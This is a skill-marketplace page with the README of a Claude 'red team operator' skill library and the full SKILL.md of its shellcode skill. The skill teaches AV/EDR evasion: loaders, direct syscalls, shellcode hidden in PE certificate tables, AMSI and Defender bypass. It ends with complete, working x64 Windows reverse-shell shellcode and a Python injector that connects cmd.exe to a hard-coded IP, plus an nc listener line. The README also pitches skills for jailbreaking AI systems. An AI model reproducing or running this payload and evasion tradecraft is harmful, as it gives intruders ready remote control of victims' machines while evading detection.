SkillAtlasSkill 详情

offensive-shellcode

Offensive security skills for Claude — drop-in SKILL.

审核状态:已审核Quality 80Security 80

复制安装命令

用 Codex 或 Claude 安装复制这段 Prompt,粘贴到 Codex、Claude 或其他助手里,让它先审查 Skill 页面再帮你安装。

复制前请先查看来源、License 和安全提示。

项目 README

来源文件:README.md

抓取于 2026年8月8日

claude-red banner

claude-red

Offensive security skills for Claude — drop-in SKILL.md files that turn Claude into a context-aware red team operator.

License: MIT Skills Categories Stars Forks

Built by SnailSploit — GenAI Security Research.


Table of Contents


What is this

claude-red is a curated library of offensive security skills for the Claude Skills system. Each skill is a structured SKILL.md file that primes Claude with expert-level methodology for a specific attack surface — from SQLi to shellcode, EDR evasion to ADCS abuse.

Drop a skill into your Claude environment and it behaves like a specialist: it knows the techniques, the tooling, the edge cases, and the escalation paths. Skills load on demand based on conversational triggers — you don't pay context for skills you aren't using.

Use it for: authorized red team engagements, bug bounty triage, security research, CTF preparation, training operators, and exploring attack surfaces methodically.


Quickstart

Claude Skills System (recommended)

# Clone into a directory Claude will scan
git clone https://github.com/SnailSploit/claude-red ~/.claude/skills/claude-red

# Or install only one category
git clone --filter=blob:none --sparse https://github.com/SnailSploit/claude-red
cd claude-red && git sparse-checkout set Skills/web Skills/active-directory

Claude will auto-load matching skills based on conversational triggers (e.g. mentioning SQLi loads offensive-sqli).

Claude Code

# Point Claude at a single skill before a session
cat Skills/web/offensive-sqli/SKILL.md | claude --system-file -

# Or load a whole category
cat Skills/active-directory/**/SKILL.md | claude --system-file -

Claude.ai (Manual)

Paste the contents of a SKILL.md into a Project's system prompt or prepend to your conversation.

Install Script

./install.sh                           # interactive
./install.sh --target ~/.claude/skills # explicit target
./install.sh --category web            # one category

Categories

CategorySkillsFocus
Web Application16OWASP Top 10 + business logic + advanced web bug classes
Auth & Identity2JWT, OAuth
Active Directory1On-prem AD attack methodology (expanding)
Wireless13802.11, WPA2/3, EAP, WPS, evil-twin, BLE, Zigbee, Z-Wave, LoRa, sub-GHz
Cloud1AWS / Azure / GCP attack paths (expanding)
Mobile1Android + iOS pentest (expanding)
IoT & Embedded1Hardware, firmware, RTOS, ICS (expanding)
Infrastructure & Red Team7Initial access, EDR evasion, Windows ops
Exploit Development6Stack/heap, mitigations, crash analysis, TOCTOU
Fuzzing & VR4libFuzzer, AFL++, bug ID, vuln classes
Reconnaissance2OSINT tooling and methodology
AI Security1Prompt injection, jailbreaks, RAG poisoning
Utility2Fast-checking, professional reporting

Skill Index

Web Application

Skills/web/

SkillDescription
offensive-sqliSQL injection — error/blind/OOB, DB-specific, ORM CVEs, cloud paths
offensive-xssCross-site scripting — stored, reflected, DOM, mutation
offensive-ssrfServer-side request forgery — cloud metadata, filter bypass
offensive-sstiServer-side template injection — engine ID, RCE paths
offensive-xxeXML external entity — OOB exfil, blind exploitation
offensive-idorInsecure direct object references — enumeration, business logic
offensive-file-uploadFile upload — extension bypass, polyglots, webshells
offensive-rceRemote code execution — chaining, command injection
offensive-deserializationInsecure deserialization — Java/PHP/.NET gadget chains
offensive-race-conditionRace conditions — TOCTOU, single-packet, limit bypass
offensive-request-smugglingHTTP request smuggling — CL.TE, TE.CL, h2 desync
offensive-open-redirectOpen redirect — OAuth abuse, phishing, SSRF pivots
offensive-parameter-pollutionHTTP parameter pollution — WAF bypass, logic confusion
offensive-graphqlGraphQL — introspection, batching, IDOR via aliases
offensive-waf-bypassWAF bypass — encoding, chunking, case mutation
offensive-business-logicBusiness logic — workflow bypass, pricing, refunds, chains

Auth & Identity

Skills/auth/

SkillDescription
offensive-jwtJWT — alg:none, key confusion, secret cracking
offensive-oauthOAuth — open redirect abuse, token leakage, PKCE bypass

Active Directory

Skills/active-directory/

SkillDescription
offensive-active-directoryAD — Kerberoast, ASREProast, ACL abuse, ADCS ESC1-15, delegation, persistence, hybrid AAD

Note: This category is being expanded. The AD overview is being split into 16 focused skills (Kerberoasting, ASREProasting, ADCS, coercion, NTLM relay, BloodHound, ticket forgery, GPO abuse, etc.). See Roadmap.

Wireless

Skills/wireless/

SkillDescription
offensive-wifi802.11 overview — entrypoint into the wireless category
offensive-wifi-reconAdapter selection, monitor mode, multi-band airspace mapping
offensive-wpa2-pskHandshake capture, PMKID, hashcat 22000 cracking
offensive-wpa3-saeTransition-mode downgrade, Dragonblood, SAE side-channels
offensive-wpa-enterprise802.1X / EAP attacks, eaphammer evil-twin RADIUS
offensive-wpsPixie Dust, online PIN brute, vendor PIN generators
offensive-evil-twinKARMA, Mana, captive portal, post-association MITM
offensive-krack-fragattacksKRACK + FragAttacks supplicant testing
offensive-deauth-disassocTargeted/broadcast deauth, PMF awareness, action frames
offensive-bluetooth-bleBLE GATT enum, pairing downgrade, sniffing, MITM
offensive-bluetooth-classicBR/EDR — SDP, SPP, KNOB, BlueBorne, HID spoofing
offensive-zigbee-thread-matter802.15.4 mesh — KillerBee, Touchlink abuse, ZCL command injection
offensive-z-waveS0 key derivation flaw, S2 commissioning, hub pivots
offensive-lorawan-sub-ghzLoRaWAN ABP/OTAA, KeeLoq garage doors, fixed-code, TPMS

Cloud

Skills/cloud/

SkillDescription
offensive-cloudAWS / Azure / GCP — privesc, IMDS, cross-account, persistence, CSPM evasion

Note: Cloud-identity (Entra/AAD/Okta hybrid) skills coming separately. See Roadmap.

Mobile

Skills/mobile/

SkillDescription
offensive-mobileAndroid + iOS — Frida, pinning, storage, biometric, deep links

IoT & Embedded

Skills/iot/

SkillDescription
offensive-iotHardware recon, firmware, RTOS, ICS/OT, MQTT/CoAP

Note: Being split into 10 focused skills (UART/JTAG, flash dump, fault injection, U-Boot, secure boot, RTOS, ICS protocols). See Roadmap.

Infrastructure & Red Team

Skills/infrastructure/

SkillDescription
offensive-initial-accessPhishing, drive-by, supply chain — TA0001
offensive-advanced-redteamFull kill chain, C2, OPSEC, lateral, persistence
offensive-edr-evasionUnhooking, indirect syscalls, PPID spoofing
offensive-shellcodeWriting, encoding, injection techniques
offensive-keylogger-archKeylogger architecture and input-capture techniques
offensive-windows-mitigationsWindows mitigations — ACG, Arbitrary Code Guard
offensive-windows-boundariesDefeating Windows boundaries — sandbox escape, privilege

Exploit Development

Skills/exploit-dev/

SkillDescription
offensive-exploit-developmentStack/heap, ROP chains, mitigations
offensive-exploit-dev-courseStructured curriculum format
offensive-basic-exploitationLinux exploitation, mitigations disabled — beginner-to-mid
offensive-crash-analysisCrash triage, exploitability assessment, root cause
offensive-mitigationsModern kernel mitigations — ASLR, CFG, CET, PAC
offensive-toctouTime-of-check/use across binary, kernel, web, container

Fuzzing & Vulnerability Research

Skills/fuzzing/

SkillDescription
offensive-fuzzinglibFuzzer, AFL++, coverage-guided, mutation strategies
offensive-fuzzing-courseCurriculum — finding vulns via fuzzing
offensive-bug-identificationCode review patterns, static analysis triggers
offensive-vuln-classesVulnerability classes — real-world examples, taxonomy

Reconnaissance

Skills/recon/

SkillDescription
offensive-osintOSINT tools — recon-ng, theHarvester, Maltego pipelines
offensive-osint-methodologyOSINT methodology — structured intelligence collection

AI Security

Skills/ai/

SkillDescription
offensive-ai-securityAI pentest — prompt injection, jailbreaking, RAG poisoning

Utility

Skills/utility/

SkillDescription
offensive-fast-checkingFast triage checklist — quick-win identification
offensive-reportingPro pentest reporting — CVSS, evidence, exec summary, retest

Roadmap

The library is being expanded in seven phases. Track progress in CHANGELOG.md.

PhaseCategoryNew SkillsStatus
1Internal AD/Windows (rename active-directory/ → internal/)+16Planned
2Cloud Identity (Entra/AAD, ADFS, Okta, M365)+10Planned
3Wireless split (WPA2/3, EAP, BLE, Zigbee, Z-Wave, LoRa, sub-GHz)+12Mandatory
4IoT split (UART/JTAG, flash, fault injection, RTOS, ICS)+10Planned
5Web Basics (recon, auth bypass, access control, CSRF, headers, CORS, cache, clickjack)+8Planned
6Web Advanced (proto pollution, SAML, OIDC, WebSocket, gRPC, postMessage, SSI/ESI, CSTI)+10Planned
7Polish (README, LICENSE, manifest, install)—In progress

End state: ~107 skills across the same 13+ categories.


Contributing

Contributions welcome. See CONTRIBUTING.md for the skill template, frontmatter standard, and review process. Focused, single-surface skills are preferred over monolithic overviews.

License

MIT — use freely, attribution appreciated.

Acknowledgements

  • Author: Kai Aizen (SnailSploit) — snailsploit.com
  • Original Checklists: Sahar Shlichov — the offensive checklist collection many of these skills are based on.
  • Community: PRs and feedback that keep the library current with the threat landscape.

"Give Claude the right skill and it stops being a chatbot. It becomes an operator."


📚 Documentation & Author

This project's full writeup, methodology, and related research lives at:

https://snailsploit.com/claude-red

Created by Kai Aizen — independent offensive security researcher.

snailsploit.com · Research · Frameworks · GitHub · LinkedIn · ResearchGate · X/Twitter

Same attack. Different substrate.

开发与工程内容与创作

中风险

  • 来源需自行核对维护者身份。
  • 包含脚本或命令调用,安装前请复核。
  • 未检测到明显外部权限要求。
  • 未检测到高风险命令。
  • 扫描发现:3 条。

Codex — Git Clone 安装

  1. 安装前请先查看来源仓库和风险报告。
  2. 克隆仓库:git clone https://github.com/SnailSploit/Claude-Red.git
  3. 将 "Skills/infrastructure/offensive-shellcode" 文件夹复制到 Codex 的 skills 目录中。
  4. 重启 Codex 让新的 skill 生效。

Codex — 手动复制安装

  1. 安装前请先查看来源仓库和风险报告。
  2. 从源仓库下载 SKILL.md 及相关文件。
  3. 在 Codex 的 skills 目录中创建新文件夹。
  4. 将所有 skill 文件复制到新文件夹中。
  5. 重启 Codex 让新的 skill 生效。

Claude Code — Git Clone 安装

  1. 安装前请先查看来源仓库和风险报告。
  2. 克隆仓库:git clone https://github.com/SnailSploit/Claude-Red.git
  3. 将 "Skills/infrastructure/offensive-shellcode" 文件夹复制到 Claude Code 的 skills 目录中。
  4. 重启 Claude Code 让新的 skill 生效。

Claude Code — 手动复制安装

  1. 安装前请先查看来源仓库和风险报告。
  2. 从源仓库下载 SKILL.md 及相关文件。
  3. 在 Claude Code 的 skills 目录中创建新文件夹。
  4. 将所有 skill 文件复制到新文件夹中。
  5. 重启 Claude Code 让新的 skill 生效。

Cursor — Git Clone 安装

  1. 安装前请先查看来源仓库和风险报告。
  2. 克隆仓库:git clone https://github.com/SnailSploit/Claude-Red.git
  3. 将 "Skills/infrastructure/offensive-shellcode" 文件夹复制到 Cursor 的 skills 目录中。
  4. 重启 Cursor 让新的 skill 生效。

Cursor — 手动复制安装

  1. 安装前请先查看来源仓库和风险报告。
  2. 从源仓库下载 SKILL.md 及相关文件。
  3. 在 Cursor 的 skills 目录中创建新文件夹。
  4. 将所有 skill 文件复制到新文件夹中。
  5. 重启 Cursor 让新的 skill 生效。

GitHub Copilot — Git Clone 安装

  1. 安装前请先查看来源仓库和风险报告。
  2. 克隆仓库:git clone https://github.com/SnailSploit/Claude-Red.git
  3. 将 "Skills/infrastructure/offensive-shellcode" 文件夹复制到 GitHub Copilot 的 skills 目录中。
  4. 重启 GitHub Copilot 让新的 skill 生效。

GitHub Copilot — 手动复制安装

  1. 安装前请先查看来源仓库和风险报告。
  2. 从源仓库下载 SKILL.md 及相关文件。
  3. 在 GitHub Copilot 的 skills 目录中创建新文件夹。
  4. 将所有 skill 文件复制到新文件夹中。
  5. 重启 GitHub Copilot 让新的 skill 生效。

Windsurf — Git Clone 安装

  1. 安装前请先查看来源仓库和风险报告。
  2. 克隆仓库:git clone https://github.com/SnailSploit/Claude-Red.git
  3. 将 "Skills/infrastructure/offensive-shellcode" 文件夹复制到 Windsurf 的 skills 目录中。
  4. 重启 Windsurf 让新的 skill 生效。

Windsurf — 手动复制安装

  1. 安装前请先查看来源仓库和风险报告。
  2. 从源仓库下载 SKILL.md 及相关文件。
  3. 在 Windsurf 的 skills 目录中创建新文件夹。
  4. 将所有 skill 文件复制到新文件夹中。
  5. 重启 Windsurf 让新的 skill 生效。
查看 SKILL.md 原文
name: offensive-shellcode
description: "Shellcode development reference for offensive security engagements. Use when writing custom x86/x64 shellcode, implementing position-independent code (PIC), building shellcode loaders, evading AV/EDR detection, or converting PE files to shellcode. Covers null byte avoidance, API hashing, encoder/decoder patterns, staged vs stageless payloads, Windows PEB traversal, and cross-platform shellcode techniques."

Shellcode Development Workflow

  1. Define concept and target platform (x86/x64, Windows/Linux/macOS)
  2. Write assembly using position-independent techniques
  3. Extract binary and test in controlled environment
  4. Apply null byte avoidance and optimizations
  5. Encode/encrypt to evade static detection
  6. Package with loader and choose delivery method

Basic Concepts

Execution Pattern (Allocate-Write-Execute)

Avoid direct PAGE_EXECUTE_READWRITE — prefer:

  1. Allocate with PAGE_READWRITE
  2. Write shellcode to allocated region
  3. Call VirtualProtect to switch to PAGE_EXECUTE_READ
char *dest = VirtualAlloc(NULL, 0x1234, MEM_COMMIT|MEM_RESERVE, PAGE_READWRITE);
memcpy(dest, shellcode, 0x1234);
VirtualProtect(dest, 0x1234, PAGE_EXECUTE_READ, &old);
((void(*)())dest)();

Position-Independent Code (PIC) Techniques

MethodPlatformNotes
Call/PopWindowsPush next addr, pop into register
FPU stateWindowsfstenv saves instruction pointer
SEHWindowsException handler stores EIP
GOTLinuxGlobal Offset Table
VDSOLinuxKernel-provided shared object

Windows API Resolution (PEB Walk)

Identifying kernel32.dll without imports:

  1. Get PEB via gs:[0x60] (x64) or fs:[0x30] (x86)
  2. Walk PEB->Ldr.InMemoryOrderModuleList — order: exe → ntdll → kernel32
  3. Hash-compare module names to locate kernel32
  4. Parse the Export Address Table (EAT)
  5. Find GetProcAddress by name hash, then resolve LoadLibraryA
  6. Use LoadLibraryA to load WS2_32.dll, resolve Winsock functions

WinDbg helpers for debugging PEB walk:

dt nt!_TEB -y ProcessEnvironmentBlock @$teb
dt nt!_PEB -y Ldr <peb_addr>
dt -r _PEB_LDR_DATA <ldr_addr>
dt _LDR_DATA_TABLE_ENTRY (<init_flink_addr> - 0x10)
lm m kernel32   # verify base address
r @r8           # check register

Shellcode Loaders

Loader Responsibilities

  • Environment verification / keying (sandbox detection)
  • Shellcode decryption
  • Safe memory allocation and injection
  • Ends its duties after injecting

Recommended languages: Zig (small, no runtime), Rust (secure), Nim, Go (watch for runtime signatures)

Allocation Phase

Avoid RWX allocations — use two-step:

  • VirtualAllocEx / NtAllocateVirtualMemory — allocate RW
  • ZwCreateSection + NtMapViewOfSection — alternative approach
  • After writing: VirtualProtectEx to switch to RX

Other options: code caves, stack/heap (with DEP disabled)

Write Phase

  • WriteProcessMemory / NtWriteVirtualMemory
  • memcpy to mapped section

Evasion tips:

  • Prepend shellcode with dummy opcodes
  • Split into chunks, write in randomized order
  • Add delays between writes

Execute Phase

Most scrutinized step — EDR checks thread start address against image-backed memory:

TechniqueNotes
CreateRemoteThread / ZwCreateThreadExLoud, heavily monitored
NtSetContextThreadHijack suspended thread
NtQueueApcThreadExAPC injection
API trampolinesOverwrite function prologue
ThreadlessInjectNo new threads created

Indirect execution resources:


PE-to-Shellcode Conversion

ToolPurpose
DonutEXE/DLL → shellcode
sRDIDLL → position-independent shellcode
Pe2shcPE → shellcode
AmberReflective PE packer

Open-source loaders:

  • ScareCrow
  • NimPackt-v1
  • NullGate — indirect syscalls + junk-write sequencing
  • DripLoader — chunked RW writes + direct syscalls + JMP trampoline
  • ProtectMyTooling — chain multiple protections
  • Direct-syscall helpers: SysWhispers3, FreshyCalls (now baseline requirements)

Shellcode Storage & Hiding

LocationRiskNotes
Hardcoded in .textMediumRequires recompile; stored RW/RO
PE Resources (RCDATA)HighMost scanned by AV
Extra PE sectionMediumUse second-to-last section
Certificate TableLowKeeps signed PE signature intact
Internet-hostedVariableSharpShooter

Certificate Table technique (recommended):

  • Pad Certificate Table with shellcode bytes; update PE headers
  • Backdoor only the loader DLL (e.g., ffmpeg.dll in teams.exe)
  • Main executable signature remains valid; only the DLL signature breaks

Protection: Compress with LZMA; encrypt with XOR32, RC4, or AES before storing.

Windows 11 24H2 note: AMSI heap scanning is active. Allocate with PAGE_NOACCESS, decrypt in place, then switch to PAGE_EXECUTE_READ to avoid live-heap scans.


Evasion

Progressive Evasion Escalation

  1. Basic shellcode execution (baseline)
  2. Add XOR/AES encryption + obfuscation
  3. Direct syscalls to bypass userland hooks
  4. Remote process injection as last resort

Local vs Remote Injection

Remote injection is more detectable:

  • CFG / CIG enforcement
  • ETW Ti feeds
  • EDR call-stack back-tracing (NtOpenProcess invocation source)
  • More scrutinized steps: OpenProcess → Allocate → Write → Execute

Defender bypass tools (DefenderBypass):

  • myEncoder3.py — XOR-encrypt binary shellcode
  • InjectBasic.cpp — basic C++ injector
  • InjectCryptXOR.cpp — XOR decrypt + inject
  • InjectSyscall-LocalProcess.cpp — direct syscalls, no suspicious IAT entries
  • InjectSyscall-RemoteProcess.cpp — remote process injection via direct syscalls

Cross-Platform Considerations

Windows on ARM64 (WoA)

  • Syscalls use SVC 0 with ARM64 table in ntdll!KiServiceTableArm64
  • Pointer Authentication (PAC) signs LR — avoid stack pivots or re-sign with PACIASP

Linux 6.9+ (eBPF Arena)

  • BPF_MAP_TYPE_ARENA maps can hold executable memory
  • Hide shellcode chunks in arena map, execute via bpf_prog_run_pin_on_cpu

macOS (Signed System Volume)

  • macOS 12+ seals the system partition; unsigned payloads cannot reside there
  • Userspace: launch agents, dylib hijacks in /Library/Apple/System/Library/Dyld/
  • Kernel persistence: create sealed snapshot, mount RW, inject, resign with kmutil, bless

DripLoader Technique

github.com/xuanxuan0/DripLoader:

  1. Reserve 64KB chunks with NO_ACCESS
  2. Allocate 4KB RW chunks within that pool
  3. Write shellcode in chunks in randomized order
  4. Re-protect to RX
  5. Overwrite prologue of ntdll!RtlpWow64CtxFromAmd64 with JMP trampoline
  6. All calls via direct syscalls: NtAllocateVirtualMemory, NtWriteVirtualMemory, NtCreateThreadEx

Full x64 Reverse Shell Shellcode (Windows)

Complete Python/Keystone example implementing PEB walk → GetProcAddress → LoadLibraryA → Winsock connect → CreateProcessA(cmd.exe):

import ctypes, struct
from keystone import *

CODE = (
# Locate kernel32 Base Address
    " start:                         "
    "   add rsp, 0xfffffffffffffdf8 ;" # Avoid Null Byte and make some space
    " find_kernel32:                 "
    "   int3                        ;" # WinDbg breakpoint (disable for release)
    "   xor rcx, rcx                ;"
    "   mov rax, gs:[rcx + 0x60]    ;" # RAX = PEB
    "   mov rax, [rax + 0x18]       ;" # RAX = PEB->Ldr
    "   mov rsi, [rax + 0x20]       ;" # RSI = InMemoryOrderModuleList
    "   lodsq                       ;"
    "   xchg rax, rsi               ;"
    "   lodsq                       ;"
    "   mov rbx, [rax + 0x20]       ;" # RBX = kernel32 base
    "   mov r8, rbx                 ;"
# Parse Export Address Table
    "   mov ebx, [rbx+0x3C]         ;" # PE signature offset
    "   add rbx, r8                 ;" # RBX = PE header
    "   xor r12,r12                 ;"
    "   add r12, 0x88FFFFF          ;"
    "   shr r12, 0x14               ;"
    "   mov edx, [rbx+r12]          ;" # EAT RVA
    "   add rdx, r8                 ;" # RDX = EAT VA
    "   mov r10d, [rdx+0x14]        ;" # NumberOfFunctions
    "   xor r11, r11                ;"
    "   mov r11d, [rdx+0x20]        ;" # AddressOfNames RVA
    "   add r11, r8                 ;" # AddressOfNames VA
# Find GetProcAddress
    "   mov rcx, r10                ;"
    " k32findfunction:               "
    "   jecxz functionfound         ;"
    "   xor ebx,ebx                 ;"
    "   mov ebx, [r11+4+rcx*4]      ;" # Function name RVA
    "   add rbx, r8                 ;" # Function name VA
    "   dec rcx                     ;"
    "   mov rax, 0x41636f7250746547 ;" # 'GetProcA'
    "   cmp [rbx], rax              ;"
    "   jnz k32findfunction         ;"
# Get function address
    " functionfound:                 "
    "   xor r11, r11                ;"
    "   mov r11d, [rdx+0x24]        ;" # AddressOfNameOrdinals RVA
    "   add r11, r8                 ;"
    "   inc rcx                     ;"
    "   mov r13w, [r11+rcx*2]       ;" # Ordinal
    "   xor r11, r11                ;"
    "   mov r11d, [rdx+0x1c]        ;" # AddressOfFunctions RVA
    "   add r11, r8                 ;"
    "   mov eax, [r11+4+r13*4]      ;"
    "   add rax, r8                 ;" # GetProcAddress VA
    "   mov r14, rax                ;" # R14 = GetProcAddress
# Resolve LoadLibraryA
    "   mov rcx, 0x41797261         ;"
    "   push rcx                    ;"
    "   mov rcx, 0x7262694c64616f4c ;"
    "   push rcx                    ;" # 'LoadLibraryA'
    "   mov rdx, rsp                ;"
    "   mov rcx, r8                 ;" # kernel32 base
    "   sub rsp, 0x30               ;"
    "   call r14                    ;" # GetProcAddress(kernel32, LoadLibraryA)
    "   add rsp, 0x40               ;"
    "   mov rsi, rax                ;" # RSI = LoadLibraryA
# LoadLibrary("WS2_32.dll")
    "   xor rax, rax                ;"
    "   mov rax, 0x6C6C             ;"
    "   push rax                    ;"
    "   mov rax, 0x642E32335F325357 ;"
    "   push rax                    ;" # 'WS2_32.dll'
    "   mov rcx, rsp                ;"
    "   sub rsp, 0x30               ;"
    "   call rsi                    ;" # LoadLibraryA("WS2_32.dll")
    "   mov r15, rax                ;" # R15 = WS2_32 base
    "   add rsp, 0x40               ;"
# WSAStartup
    "   mov rax, 0x7075             ;"
    "   push rax                    ;"
    "   mov rax, 0x7472617453415357 ;"
    "   push rax                    ;" # 'WSAStartup'
    "   mov rdx, rsp                ;"
    "   mov rcx, r15                ;"
    "   sub rsp, 0x30               ;"
    "   call r14                    ;" # GetProcAddress(ws2_32, WSAStartup)
    "   add rsp, 0x40               ;"
    "   mov r12, rax                ;"
    "   xor rcx,rcx                 ;"
    "   mov cx,408                  ;"
    "   sub rsp,rcx                 ;"
    "   lea rdx,[rsp]               ;" # lpWSAData
    "   mov cx,514                  ;" # wVersionRequired = 2.2
    "   sub rsp,88                  ;"
    "   call r12                    ;" # WSAStartup
# WSASocketA — create socket
    "   mov rax, 0x4174             ;"
    "   push rax                    ;"
    "   mov rax, 0x656b636f53415357 ;"
    "   push rax                    ;" # 'WSASocketA'
    "   mov rdx, rsp                ;"
    "   mov rcx, r15                ;"
    "   sub rsp, 0x30               ;"
    "   call r14                    ;"
    "   add rsp, 0x40               ;"
    "   mov r12, rax                ;"
    "   sub rsp,0x208               ;"
    "   xor rdx, rdx                ;"
    "   sub rsp, 88                 ;"
    "   mov [rsp+32], rdx           ;"
    "   mov [rsp+40], rdx           ;"
    "   inc rdx                     ;"
    "   mov rcx, rdx                ;"
    "   inc rcx                     ;"
    "   xor r8,r8                   ;"
    "   add r8,6                    ;"
    "   xor r9,r9                   ;"
    "   mov r9w,98*4                ;"
    "   mov ebx,[r15+r9]            ;"
    "   xor r9,r9                   ;"
    "   call r12                    ;" # WSASocketA
    "   mov r13, rax                ;" # R13 = socket handle
    "   add rsp, 0x208              ;"
# WSAConnect — connect to C2
    "   mov rax, 0x7463             ;"
    "   push rax                    ;"
    "   mov rax, 0x656e6e6f43415357 ;"
    "   push rax                    ;" # 'WSAConnect'
    "   mov rdx, rsp                ;"
    "   mov rcx, r15                ;"
    "   sub rsp, 0x30               ;"
    "   call r14                    ;"
    "   add rsp, 0x40               ;"
    "   mov r12, rax                ;"
    "   mov rcx, r13                ;" # socket handle
    "   sub rsp,0x208               ;"
    "   xor rax,rax                 ;"
    "   inc rax                     ;"
    "   inc rax                     ;"
    "   mov [rsp], rax              ;" # AF_INET = 2
    "   mov rax, 0xbb01             ;" # Port 443 (big-endian)
    "   mov [rsp+2], rax            ;"
    "   mov rax, 0x31061fac         ;" # IP 172.31.6.49 — UPDATE THIS
    "   mov [rsp+4], rax            ;"
    "   lea rdx,[rsp]               ;"
    "   mov r8, 0x16                ;" # sizeof(sockaddr_in)
    "   xor r9,r9                   ;"
    "   push r9                     ;"
    "   push r9                     ;"
    "   push r9                     ;"
    "   sub rsp, 0x88               ;"
    "   call r12                    ;" # WSAConnect
# Re-locate kernel32 and resolve CreateProcessA
    "   xor rcx, rcx                ;"
    "   mov rax, gs:[rcx + 0x60]    ;"
    "   mov rax, [rax + 0x18]       ;"
    "   mov rsi, [rax + 0x20]       ;"
    "   lodsq                       ;"
    "   xchg rax, rsi               ;"
    "   lodsq                       ;"
    "   mov rbx, [rax + 0x20]       ;"
    "   mov r8, rbx                 ;"
    "   mov rax, 0x41737365636f     ;"
    "   push rax                    ;"
    "   mov rax, 0x7250657461657243 ;"
    "   push rax                    ;" # 'CreateProcessA'
    "   mov rdx, rsp                ;"
    "   mov rcx, r8                 ;"
    "   sub rsp, 0x30               ;"
    "   call r14                    ;"
    "   add rsp, 0x40               ;"
    "   mov r12, rax                ;" # R12 = CreateProcessA
# Push cmd.exe + build STARTUPINFOA
    "   mov rax, 0x6578652e646d63   ;"
    "   push rax                    ;" # 'cmd.exe'
    "   mov rcx, rsp                ;" # lpApplicationName
    "   push r13                    ;" # hStdError = socket
    "   push r13                    ;" # hStdOutput = socket
    "   push r13                    ;" # hStdInput = socket
    "   xor rax,rax                 ;"
    "   push ax                     ;"
    "   push rax                    ;"
    "   push rax                    ;"
    "   mov rax, 0x100              ;" # STARTF_USESTDHANDLES
    "   push ax                     ;"
    "   xor rax,rax                 ;"
    "   push ax                     ;"
    "   push ax                     ;"
    "   push rax                    ;"
    "   push rax                    ;"
    "   push rax                    ;"
    "   push rax                    ;"
    "   push rax                    ;"
    "   push rax                    ;"
    "   mov rax, 0x68               ;"
    "   push rax                    ;" # cb = 0x68
    "   mov rdi,rsp                 ;" # RDI = &STARTUPINFOA
# Call CreateProcessA
    "   mov rax, rsp                ;"
    "   sub rax, 0x500              ;"
    "   push rax                    ;" # lpProcessInformation
    "   push rdi                    ;" # lpStartupInfo
    "   xor rax, rax                ;"
    "   push rax                    ;" # lpCurrentDirectory = NULL
    "   push rax                    ;" # lpEnvironment = NULL
    "   push rax                    ;"
    "   inc rax                     ;"
    "   push rax                    ;" # bInheritHandles = TRUE
    "   xor rax, rax                ;"
    "   push rax                    ;"
    "   push rax                    ;"
    "   push rax                    ;"
    "   push rax                    ;" # dwCreationFlags = 0
    "   mov r8, rax                 ;" # lpThreadAttributes = NULL
    "   mov r9, rax                 ;" # lpProcessAttributes = NULL
    "   mov rdx, rcx                ;" # lpCommandLine = 'cmd.exe'
    "   mov rcx, rax                ;" # lpApplicationName = NULL
    "   call r12                    ;" # CreateProcessA
)

ks = Ks(KS_ARCH_X86, KS_MODE_64)
encoding, count = ks.asm(CODE)
print("Encoded %d instructions..." % count)

sh = b""
for e in encoding:
    sh += struct.pack("B", e)
shellcode = bytearray(sh)

ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_void_p
ctypes.windll.kernel32.RtlCopyMemory.argtypes = (ctypes.c_void_p, ctypes.c_void_p, ctypes.c_size_t)
ctypes.windll.kernel32.CreateThread.argtypes = (
    ctypes.c_int, ctypes.c_int, ctypes.c_void_p,
    ctypes.c_int, ctypes.c_int, ctypes.POINTER(ctypes.c_int),
)

ptr = ctypes.windll.kernel32.VirtualAlloc(
    ctypes.c_int(0), ctypes.c_int(len(shellcode)),
    ctypes.c_int(0x3000), ctypes.c_int(0x40)
)
buf = (ctypes.c_char * len(shellcode)).from_buffer_copy(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_void_p(ptr), buf, ctypes.c_int(len(shellcode)))

print("Shellcode at %s" % hex(ptr))
input("Press ENTER to execute...")

ht = ctypes.windll.kernel32.CreateThread(
    ctypes.c_int(0), ctypes.c_int(0), ctypes.c_void_p(ptr),
    ctypes.c_int(0), ctypes.c_int(0), ctypes.pointer(ctypes.c_int(0)),
)
ctypes.windll.kernel32.WaitForSingleObject(ht, -1)

Note: Update IP (0x31061fac) and port (0xbb01) before use. Listener: nc -nvlp 443

Windows 11 23H2: Smart App Control may block outbound TCP 443/4444 to local subnets. Use a non-standard port or a named-pipe payload.

发现问题?提交给管理员复核

评分:

评论 (0)

暂无评论,成为第一个评论者吧!